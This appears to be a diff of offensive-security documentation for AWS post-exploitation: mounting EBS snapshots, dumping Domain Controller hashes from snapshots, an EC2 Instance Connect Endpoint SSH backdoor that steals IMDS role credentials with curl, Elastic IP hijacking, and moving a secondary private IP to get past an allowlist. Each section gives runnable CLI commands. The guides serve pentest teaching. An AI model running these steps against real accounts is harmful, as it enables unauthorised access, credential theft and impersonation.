+For more information on this technique, see the original research in [Downloading and Exploring AWS EBS Snapshots](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/).<sup>[[3]](#references)</sup>
+
+You can also use Pacu's [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) module for this workflow.<sup>[[4]](#references)</sup>
 
 ## Checking a snapshot in AWS
+
+Create a volume from the snapshot in the same Region, wait until it reaches `available`, and attach it to an instance in the same Availability Zone.<sup>[[6]](#references)[[8]](#references)</sup>
 
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89
 ```
 
-**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup):
+**Mount it in an EC2 VM under your control** (the instance must be in the same Availability Zone as the restored volume):
 
-Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes.
+Step 1: Create the EBS volume from the snapshot through EC2 → Volumes or the AWS CLI.
 
-To be able to perform this action, follow these commands:
+To perform this action:
 
 - Create an EBS volume to attach to the EC2 instance.
-- Ensure that the EBS volume and the instance are in the same zone.
+- Ensure that the EBS volume and the instance are in the same Availability Zone.
 
-Step 2: The "attach volume" option is to be selected by right-clicking on the created volume.
+Step 2: Select the created volume and choose **Attach volume**.
 
-Step 3: The instance from the instance text box is to be selected.
+Step 3: Select the instance and an available device name.
 
-To be able to perform this action, use the following command:
+The console and CLI procedures above are documented by AWS and in the original mounting walkthrough.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
-- Attach the EBS volume.
+Step 4: Log in to the EC2 instance and list the available disks using `lsblk`. The device exposed inside the instance may differ from the name supplied to `attach-volume`, especially on Nitro instances.<sup>[[7]](#references)[[8]](#references)</sup>
 
-Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`.
+Step 5: Check whether the device or one of its partitions has a filesystem using `sudo file -s <device>` or `sudo lsblk -f`.
 
-Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`.
+If `file -s` reports simply `<device>: data`, the device has no recognized filesystem. A volume restored from a snapshot usually already contains a filesystem, so inspect its partition table and do **not** format it.<sup>[[7]](#references)</sup>
 
-If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.
+Step 6: Only when working with a genuinely empty volume, create a filesystem. Do not run these commands against a volume created from a snapshot because formatting overwrites its data.<sup>[[7]](#references)</sup>
 
-Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs.
+```bash
+sudo mkfs -t ext4 /dev/xvdf
+# Or:
+sudo mkfs -t xfs /dev/xvdf
+```
 
-Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume".
+Step 7: Create a directory of your choice as the mount point, for example `newvolume`.
 
-To be able to perform this action, use the command `sudo mkdir /newvolume`.
+```bash
+sudo mkdir /newvolume
+```
 
-Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
+Step 8: Mount the volume or the partition containing its filesystem at the mount point.
 
-Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount.
+```bash
+sudo mount /dev/xvdf /newvolume/
+```
 
-To be able to perform this action, use the following commands:
+If `lsblk` shows a partition, use that partition instead, for example `/dev/xvdf1`.<sup>[[7]](#references)</sup>
 
-- Change directory to `/newvolume`.
-- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory.
+Step 9: Change directory to the mount point and check the disk space to validate the mount.
 
-You can do this with Pacu using the module `ebs__explore_snapshots`.
+```bash
+cd /newvolume
+df -h .
+```
+
+You can also use Pacu's `ebs__explore_snapshots` module, which restores and attaches snapshots to an EC2 instance for inspection and cleans up the temporary resources afterward.<sup>[[4]](#references)</sup>
 
 ## Checking a snapshot in AWS (using cli)
+
+The CLI variant creates and attaches the restored volume. Use `lsblk` to identify the actual device and mount the relevant partition; the kernel may expose a different name from the requested `/dev/sdh`.<sup>[[7]](#references)[[8]](#references)</sup> Prefer a read-only mount when the goal is acquisition or analysis.
 
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>
@@ -130,16 +150,24 @@ ls /mnt
 
 ## Shadow Copy
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+CloudCopy describes a cloud version of the Shadow Copy attack: a principal able to snapshot a Domain Controller's EBS volume can create a snapshot, make it available to an instance under its control, copy `NTDS.dit` and the `SYSTEM` registry hive, and parse them offline with Impacket's `secretsdump`. Its documented minimum victim-account permission is **`ec2:CreateSnapshot`**, but the exact workflow also uses resource discovery/sharing operations and requires access to any KMS key protecting an encrypted snapshot.<sup>[[6]](#references)[[9]](#references)</sup>
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+You can use [CloudCopy](https://github.com/Static-Flow/CloudCopy) to automate the attack, or use one of the previous techniques after creating a snapshot.<sup>[[9]](#references)</sup>
 
 ## References
 
-- [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)
+- [1] [How to Attach and Mount an EBS volume to EC2 Linux Instance](https://devopscube.com/mount-ebs-volume-ec2-instance/)
+- [2] [dsnap README](https://github.com/RhinoSecurityLabs/dsnap#readme)
+- [3] [Downloading and Exploring AWS EBS Snapshots](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
+- [4] [Pacu Module Details](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
+- [5] [Frequently asked questions for EBS direct APIs](https://docs.aws.amazon.com/ebs/latest/userguide/ebsapi-faq.html)
+- [6] [Copy an Amazon EBS snapshot](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-copy-snapshot.html)
+- [7] [Make an Amazon EBS volume available for use](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-using-volumes.html)
+- [8] [Attach an Amazon EBS volume to an Amazon EC2 instance](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-attaching-volume.html)
+- [9] [CloudCopy](https://github.com/Static-Flow/CloudCopy)
+- [10] [describe-snapshots — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-snapshots.html)
+- [11] [delete-snapshot — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/delete-snapshot.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md
@@ -1,20 +1,20 @@
 # AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection
 
-{{#include ../../../../banners/hacktricks-training.md}}
+An EC2 Instance Connect Endpoint (EIC Endpoint) is an identity-aware TCP proxy that can reach private EC2 instances without a public IP address or bastion host.<sup>[[1]](#references)</sup> A short-lived key and an EIC tunnel can therefore provide SSH access to a private Linux instance.<sup>[[4]](#references)[[6]](#references)[[7]](#references)</sup>
 
-Abuse EC2 Instance Connect Endpoint (EIC Endpoint) to gain inbound SSH access to private EC2 instances (no public IP/bastion) by:
-- Creating an EIC Endpoint inside the target subnet
-- Allowing inbound SSH on the target SG from the EIC Endpoint SG
-- Injecting a short‑lived SSH public key (valid ~60 seconds) with `ec2-instance-connect:SendSSHPublicKey`
-- Opening an EIC tunnel and pivoting to the instance to steal instance profile credentials from IMDS
+- Create an EIC Endpoint in a subnet that can route to the target.<sup>[[1]](#references)[[10]](#references)</sup>
+- Allow inbound SSH on the target security group from the EIC Endpoint security group; the endpoint security group must also allow outbound traffic to the target.<sup>[[2]](#references)</sup>
+- Inject a public key with `ec2-instance-connect:SendSSHPublicKey`; EC2 Instance Connect keeps it available for 60 seconds.<sup>[[4]](#references)[[7]](#references)</sup>
+- Open a tunnel to the instance and, from the resulting shell, query instance-profile credentials from IMDS when the instance has an attached IAM role.<sup>[[6]](#references)[[8]](#references)</sup>
 
-Impact: stealthy remote access path into private EC2 instances that bypasses bastions and public IP restrictions. The attacker can assume the instance profile and operate in the account.
+Impact: this adds a managed remote-access path to a private instance without a bastion or public IP. AWS records successful and unsuccessful connection attempts in CloudTrail; credentials retrieved from IMDS carry the permissions of the attached role.<sup>[[1]](#references)[[8]](#references)</sup>
 
 ## Requirements
-- Permissions to:
-  - `ec2:CreateInstanceConnectEndpoint`, `ec2:Describe*`, `ec2:AuthorizeSecurityGroupIngress`
-  - `ec2-instance-connect:SendSSHPublicKey`, `ec2-instance-connect:OpenTunnel`
-- Target Linux instance with SSH server and EC2 Instance Connect enabled (Amazon Linux 2 or Ubuntu 20.04+). Default users: `ec2-user` (AL2) or `ubuntu` (Ubuntu).
+- IAM permissions for the commands below:
+  - Endpoint lifecycle: `ec2:CreateInstanceConnectEndpoint`, `ec2:CreateNetworkInterface`, `ec2:CreateTags`, `iam:CreateServiceLinkedRole` (initial provisioning), `ec2:DescribeInstanceConnectEndpoints`, and `ec2:DeleteInstanceConnectEndpoint`.<sup>[[3]](#references)</sup>
+  - Network rules: `ec2:AuthorizeSecurityGroupIngress` and `ec2:RevokeSecurityGroupIngress`.
+  - Connection: `ec2-instance-connect:SendSSHPublicKey` and `ec2-instance-connect:OpenTunnel`.<sup>[[3]](#references)</sup>
+- A target Linux instance with an SSH server and EC2 Instance Connect installed/configured for ephemeral-key injection. EC2 Instance Connect is preinstalled on AL2023 standard AMIs, Amazon Linux 2 version 2.0.20190618 or later, and Ubuntu 20.04 or later; default users are `ec2-user` (Amazon Linux) and `ubuntu` (Ubuntu).<sup>[[4]](#references)[[5]](#references)</sup>
 
 ## Variables
 ```bash
@@ -29,6 +29,9 @@ export OS_USER=ec2-user
 ```
 
 ## Create EIC Endpoint
+
+The endpoint must reach the target through VPC routing and remain in `create-complete` before it is used. The loop below stops on a terminal failure instead of retrying forever.<sup>[[1]](#references)[[9]](#references)</sup>
+
 ```bash
 aws ec2 create-instance-connect-endpoint \
   --subnet-id "$SUBNET_ID" \
@@ -39,15 +42,22 @@ aws ec2 create-instance-connect-endpoint \
 
 # Wait until ready
 while true; do
-  aws ec2 describe-instance-connect-endpoints \
+  EIC_STATE=$(aws ec2 describe-instance-connect-endpoints \
     --instance-connect-endpoint-ids "$(cat EIC_ID)" --region "$REGION" \
-    --query 'InstanceConnectEndpoints[0].State' --output text | tee EIC_STATE
-  grep -q 'create-complete' EIC_STATE && break
+    --query 'InstanceConnectEndpoints[0].State' --output text)
+  printf '%s\n' "$EIC_STATE" | tee EIC_STATE
+  case "$EIC_STATE" in
+    create-complete) break ;;
+    create-failed) echo 'EIC Endpoint creation failed' >&2; exit 1 ;;
+  esac
   sleep 5
 done
 ```
 
 ## Allow traffic from EIC Endpoint to target instance
+
+With client IP preservation disabled (the default), referencing the endpoint security group as the source permits SSH from the endpoint to instances using the target security group. Ensure the endpoint security group has matching outbound TCP/22 access.<sup>[[2]](#references)</sup>
+
 ```bash
 aws ec2 authorize-security-group-ingress \
   --group-id "$TARGET_SG_ID" --protocol tcp --port 22 \
@@ -55,6 +65,9 @@ aws ec2 authorize-security-group-ingress \
 ```
 
 ## Inject ephemeral SSH key and open tunnel
+
+Generate an ED25519 key, publish its public half for the target OS user, then open a local listener backed by the EIC Endpoint. The `open-tunnel` command defaults to remote port 22; this example sets it explicitly.<sup>[[4]](#references)[[6]](#references)[[7]](#references)</sup>
+
 ```bash
 # Generate throwaway key
 ssh-keygen -t ed25519 -f /tmp/eic -N ''
@@ -74,17 +87,26 @@ aws ec2-instance-connect open-tunnel \
 TUN_PID=$!; sleep 2
 
 # SSH via the tunnel (within the 60s window)
-ssh -i /tmp/eic -p 2222 "$OS_USER"@127.0.0.1 -o StrictHostKeyChecking=no
+ssh -i /tmp/eic -p 2222 "$OS_USER"@127.0.0.1 \
+  -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
 ```
 
 ## Post-exploitation proof (steal instance profile credentials)
+
+From the shell inside the instance, use IMDSv2 to retrieve the role name and temporary credentials. IMDS exposes role credentials under `iam/security-credentials/<role-name>`; instances configured to require IMDSv2 reject the unauthenticated IMDSv1 requests used by the original example.<sup>[[8]](#references)[[9]](#references)</sup>
+
 ```bash
 # From the shell inside the instance
-curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ | tee ROLE
-curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$(cat ROLE)
+TOKEN=$(curl --noproxy '*' -sS -X PUT \
+  -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600' \
+  http://169.254.169.254/latest/api/token)
+ROLE=$(curl --noproxy '*' -sS -H "X-aws-ec2-metadata-token: $TOKEN" \
+  http://169.254.169.254/latest/meta-data/iam/security-credentials/ | tee ROLE)
+curl --noproxy '*' -sS -H "X-aws-ec2-metadata-token: $TOKEN" \
+  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
 ```
 
-Example output (truncated):
+Example output (truncated):<sup>[[8]](#references)</sup>
 ```json
 {
   "Code": "Success",
@@ -117,6 +139,20 @@ aws ec2 delete-instance-connect-endpoint \
 ```
 
 > Notes
-> - The injected SSH key is only valid for ~60 seconds; send the key right before opening the tunnel/SSH.
-> - `OS_USER` must match the AMI (e.g., `ubuntu` for Ubuntu, `ec2-user` for Amazon Linux 2).
+> - The injected SSH key is only valid for ~60 seconds; send the key right before opening the tunnel/SSH.<sup>[[4]](#references)</sup>
+> - `OS_USER` must match the AMI (e.g., `ubuntu` for Ubuntu, `ec2-user` for Amazon Linux 2).<sup>[[4]](#references)</sup>
+
+## References
+
+- [1] [Connect to your instances using a private IP address and EC2 Instance Connect Endpoint](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-with-ec2-instance-connect-endpoint.html)
+- [2] [Security groups for EC2 Instance Connect Endpoint](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/eice-security-groups.html)
+- [3] [Grant permissions to use EC2 Instance Connect Endpoint](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/permissions-for-ec2-instance-connect-endpoint.html)
+- [4] [Connect to a Linux instance using EC2 Instance Connect](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html)
+- [5] [Install EC2 Instance Connect on your EC2 instances](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-set-up.html)
+- [6] [open-tunnel — AWS CLI command reference](https://docs.aws.amazon.com/cli/latest/reference/ec2-instance-connect/open-tunnel.html)
+- [7] [send-ssh-public-key — AWS CLI command reference](https://docs.aws.amazon.com/cli/latest/reference/ec2-instance-connect/send-ssh-public-key.html)
+- [8] [Retrieve security credentials from instance metadata](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-security-credentials.html)
+- [9] [Access instance metadata for an EC2 instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
+- [10] [Create an EC2 Instance Connect Endpoint](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/create-ec2-instance-connect-endpoints.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eip-hijack-impersonation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eip-hijack-impersonation.md
@@ -1,18 +1,20 @@
 # AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
 
-Abuse `ec2:AssociateAddress` (and optionally `ec2:DisassociateAddress`) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker instance/ENI. This redirects inbound traffic destined to the EIP to the attacker and also lets the attacker originate outbound traffic with the allowlisted public IP to bypass external partner firewalls.
+Abuse `ec2:AssociateAddress` (and, when explicitly detaching first, `ec2:DisassociateAddress`) to move an Elastic IP (EIP) from a victim instance or ENI to an attacker-controlled instance or ENI. AWS can disassociate an EIP from its current instance during reassociation; traffic destined for the EIP is translated to the associated resource, while IPv4 traffic leaving a public subnet can use that EIP as its public reply address.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ## Prerequisites
-- Target EIP allocation ID in the same account/VPC.
-- Attacker instance/ENI you control.
+
+- Target EIP allocation ID owned by the account, in the Region and network border group used by the target resource. EIPs can be associated with an instance or ENI in a VPC in the account.<sup>[[1]](#references)[[3]](#references)</sup>
+- Attacker instance/ENI you control, with a service and network path that can receive the test traffic.<sup>[[3]](#references)[[4]](#references)</sup>
 - Permissions:
-  - `ec2:DescribeAddresses`
-  - `ec2:AssociateAddress` on the EIP allocation-id and on the attacker instance/ENI
-  - `ec2:DisassociateAddress` (optional). Note: `--allow-reassociation` will auto-disassociate from the prior attachment.
+  - `ec2:DescribeAddresses` to inspect the EIP and its current association.<sup>[[2]](#references)[[6]](#references)</sup>
+  - `ec2:AssociateAddress` for the target EIP. The IAM action is scoped to the `elastic-ip` resource; it is not listed as requiring an instance/ENI resource.<sup>[[2]](#references)</sup>
+  - `ec2:DisassociateAddress` when explicitly detaching the EIP first (optional).<sup>[[2]](#references)</sup>
+  - `ec2:AllocateAddress` only when the lab allocates a fresh EIP.<sup>[[2]](#references)[[5]](#references)</sup>
+
+Reassociation is automatic in the EC2 API; the example passes `--allow-reassociation` to make that behavior explicit.<sup>[[1]](#references)</sup>
 
 ## Attack
 
@@ -24,7 +26,7 @@ ATTACKER_INSTANCE=<i-attacker>
 VICTIM_INSTANCE=<i-victim>
 ```
 
-1) Allocate or identify the victim’s EIP (lab allocates a fresh one and attaches to victim)
+1) Allocate or identify the victim’s EIP (the lab path allocates a fresh VPC EIP and attaches it to the victim)<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
@@ -32,33 +34,44 @@ aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTAN
 EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)
 ```
 
-2) Verify the EIP currently resolves to the victim service (example checks for a banner)
+2) Verify the EIP currently reaches the victim service (the example checks for a banner; the route, security group, and network ACL must permit the test).<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 curl -sS http://$EIP | grep -i victim
 ```
 
-3) Re-associate the EIP to the attacker (auto-disassociates from victim)
+3) Re-associate the EIP to the attacker. If it is attached elsewhere, `AssociateAddress` disassociates it from the prior resource before associating it with the requested resource.<sup>[[1]](#references)</sup>
 
 ```bash
 aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
 ```
 
-4) Verify the EIP now resolves to the attacker service
+4) Verify the EIP now reaches the attacker service
 
 ```bash
 sleep 5; curl -sS http://$EIP | grep -i attacker
 ```
 
-Evidence (moved association):
+Evidence (moved association; compare with the pre-move value):
 
 ```bash
 aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
   --query Addresses[0].AssociationId --output text
 ```
 
+`DescribeAddresses` exposes the association ID as well as the associated instance and ENI, so those fields can also be compared before and after the move.<sup>[[6]](#references)</sup>
+
 ## Impact
-- Inbound impersonation: All traffic to the hijacked EIP is delivered to the attacker instance/ENI.
-- Outbound impersonation: Attacker can initiate traffic that appears to originate from the allowlisted public IP (useful to bypass partner/external source IP filters).
+- Inbound impersonation: Traffic destined for the hijacked EIP is translated to the private address of the attacker instance/ENI, subject to routing, security-group/NACL rules, and the service listener.<sup>[[3]](#references)[[4]](#references)</sup>
+- Outbound impersonation: From an attacker resource with public-subnet and internet-gateway reachability, IPv4 traffic can use the EIP as its public reply/source address, so an external source-IP allowlist may accept it.<sup>[[4]](#references)</sup>
+
+## References
+
+- [1] [AssociateAddress - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_AssociateAddress.html)
+- [2] [Actions, resources, and condition keys for Amazon EC2 - AWS Identity and Access Management](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ec2.html)
+- [3] [Elastic IP address concepts and rules - Amazon VPC User Guide](https://docs.aws.amazon.com/vpc/latest/userguide/vpc-eip-overview.html)
+- [4] [Enable internet access for a VPC using an internet gateway - Amazon VPC User Guide](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Internet_Gateway.html)
+- [5] [AllocateAddress - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_AllocateAddress.html)
+- [6] [DescribeAddresses - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeAddresses.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eni-secondary-ip-hijack.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eni-secondary-ip-hijack.md
@@ -1,58 +1,79 @@
 # AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)
 
-{{#include ../../../../banners/hacktricks-training.md}}
+Abuse `ec2:UnassignPrivateIpAddresses` and `ec2:AssignPrivateIpAddresses` to move a victim ENI’s secondary private IP to an attacker ENI in the same subnet/AZ. Secondary private IPv4 addresses are separate from the primary address and can be reassigned between instances; the EC2 API reports that this remapping is asynchronous.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Abuse `ec2:UnassignPrivateIpAddresses` and `ec2:AssignPrivateIpAddresses` to steal a victim ENI’s secondary private IP and move it to an attacker ENI in the same subnet/AZ. Many internal services and security groups gate access by specific private IPs. By moving that secondary address, the attacker impersonates the trusted host at L3 and can reach allowlisted services.
+When a service’s inbound policy allows a specific private IPv4 address, moving that address can make traffic from the attacker match the same `/32` source rule. This is an address reassignment at the VPC/ENI layer, not arbitrary packet-source spoofing.<sup>[[1]](#references)[[2]](#references)[[5]](#references)</sup>
 
 Prereqs:
-- Permissions: `ec2:DescribeNetworkInterfaces`, `ec2:UnassignPrivateIpAddresses` on the victim ENI ARN, and `ec2:AssignPrivateIpAddresses` on the attacker ENI ARN.
-- Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (primary cannot be unassigned).
+- Permissions: `ec2:DescribeNetworkInterfaces`, `ec2:UnassignPrivateIpAddresses`, and `ec2:AssignPrivateIpAddresses`. If you create a lab allowlist with step 2, also grant `ec2:AuthorizeSecurityGroupIngress` for that test security group.<sup>[[2]](#references)[[4]](#references)[[6]](#references)[[7]](#references)</sup>
+- Both ENIs must be customer-managed ENIs in the same subnet (and therefore the same Availability Zone). The target address must be a secondary private IPv4 address; primary private IPv4 addresses are not movable.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+- Use a dedicated test service/security group. Security-group rules are additive across associated groups, so adding a `/32` rule does not remove broader or pre-existing access.<sup>[[5]](#references)</sup>
 
 Variables:
 - REGION=us-east-1
 - VICTIM_ENI=<eni-xxxxxxxx>
 - ATTACKER_ENI=<eni-yyyyyyyy>
-- PROTECTED_SG=<sg-protected>   # SG on a target service that allows only $HIJACK_IP
+- PROTECTED_SG=<sg-lab>   # Dedicated test SG; add or verify a rule for $HIJACK_IP
 - PROTECTED_HOST=<private-dns-or-ip-of-protected-service>
 
 Steps:
-1) Pick a secondary IP from the victim ENI
+1) Pick a secondary IP from the victim ENI. The `Primary` field in the network-interface response distinguishes the primary address from secondary addresses.<sup>[[4]](#references)</sup>
 ```bash
-aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress --output text | head -n1 | tee HIJACK_IP
+aws ec2 describe-network-interfaces --network-interface-ids "$VICTIM_ENI" --region "$REGION" \
+  --query 'NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress' \
+  --output text | head -n1 | tee HIJACK_IP
 export HIJACK_IP=$(cat HIJACK_IP)
 ```
 
-2) Ensure the protected host allows only that IP (idempotent). If using SG-to-SG rules instead, skip.
+2) In an isolated lab, add the source rule for the service port. This command adds a rule; it does not remove existing rules, and it can return a duplicate-rule error if the rule already exists. If the service already has the required rule or uses SG-to-SG referencing, skip this step.<sup>[[5]](#references)[[6]](#references)</sup>
 ```bash
-aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80   --cidr "$HIJACK_IP/32" --region $REGION || true
+aws ec2 authorize-security-group-ingress --group-id "$PROTECTED_SG" --protocol tcp --port 80 \
+  --cidr "$HIJACK_IP/32" --region "$REGION"
 ```
 
-3) Baseline: from attacker instance, request to PROTECTED_HOST should fail without spoofed source (e.g., over SSM/SSH)
+3) Baseline: from the attacker instance (for example over SSM/SSH), record a request while its current source is not `HIJACK_IP`. It should be denied by the test policy when that policy allows only the selected `/32`; the command tolerates the expected failure.<sup>[[5]](#references)</sup>
 ```bash
-curl -sS --max-time 3 http://$PROTECTED_HOST || true
+curl -sS --max-time 3 "http://$PROTECTED_HOST" || true
 ```
 
-4) Unassign the secondary IP from the victim ENI
+4) Unassign the secondary IP from the victim ENI. The EC2 operation accepts secondary private IP addresses, not a network interface’s primary address.<sup>[[7]](#references)</sup>
 ```bash
-aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI   --private-ip-addresses $HIJACK_IP --region $REGION
+aws ec2 unassign-private-ip-addresses --network-interface-id "$VICTIM_ENI" \
+  --private-ip-addresses "$HIJACK_IP" --region "$REGION"
 ```
 
-5) Assign the same IP to the attacker ENI (on AWS CLI v1 add `--allow-reassignment`)
+5) Assign the same IP to the attacker ENI. `--allow-reassignment` permits the API to move an address that is still associated during propagation; the API documents that remapping is asynchronous.<sup>[[2]](#references)[[8]](#references)</sup>
 ```bash
-aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI   --private-ip-addresses $HIJACK_IP --region $REGION
+aws ec2 assign-private-ip-addresses --network-interface-id "$ATTACKER_ENI" \
+  --private-ip-addresses "$HIJACK_IP" --allow-reassignment --region "$REGION"
 ```
 
-6) Verify ownership moved
+6) Verify that the address appears on the attacker ENI. Wait and retry if the first check runs before the asynchronous remapping completes.<sup>[[2]](#references)[[4]](#references)</sup>
 ```bash
-aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress --output text | grep -w $HIJACK_IP
+aws ec2 describe-network-interfaces --network-interface-ids "$ATTACKER_ENI" --region "$REGION" \
+  --query 'NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress' --output text | grep -w "$HIJACK_IP"
 ```
 
-7) From the attacker instance, source-bind to the hijacked IP to reach the protected host (ensure the IP is configured on the OS; if not, add it with `ip addr add $HIJACK_IP/<mask> dev eth0`)
+7) From the attacker instance, configure the OS to recognize the secondary address if needed, then source-bind to it. Replace `24` with the actual subnet prefix; AWS notes that secondary addresses must be configured in the guest OS before use.<sup>[[3]](#references)</sup>
 ```bash
-curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out
+# Run only when the address is not already configured; replace 24 with the subnet prefix.
+sudo ip addr add "$HIJACK_IP/24" dev eth0
+curl --interface "$HIJACK_IP" -sS "http://$PROTECTED_HOST" -o /tmp/poc.out && head -c 80 /tmp/poc.out
 ```
 
 ## Impact
-- Bypass IP allowlists and impersonate trusted hosts within the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
-- Reach internal services that gate access by specific source IPs, enabling lateral movement and data access.
+- Bypass an IP-based allowlist in the test scenario by moving the allowlisted secondary private IP between ENIs in the same subnet/AZ.<sup>[[1]](#references)[[2]](#references)[[5]](#references)</sup>
+- Reach internal services that gate access by specific source IPs, potentially enabling lateral movement or data access; the result still depends on routing, security groups, network ACLs, and the service’s own authorization.
+
+## References
+
+- [1] [Elastic network interfaces - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html)
+- [2] [AssignPrivateIpAddresses - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_AssignPrivateIpAddresses.html)
+- [3] [Secondary IP addresses for your EC2 instances - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-secondary-ip-addresses.html)
+- [4] [describe-network-interfaces - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-network-interfaces.html)
+- [5] [Security group rules - Amazon Virtual Private Cloud](https://docs.aws.amazon.com/vpc/latest/userguide/security-group-rules.html)
+- [6] [authorize-security-group-ingress - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/authorize-security-group-ingress.html)
+- [7] [UnassignPrivateIpAddresses - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_UnassignPrivateIpAddresses.html)
+- [8] [assign-private-ip-addresses - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/assign-private-ip-addresses.html)
+
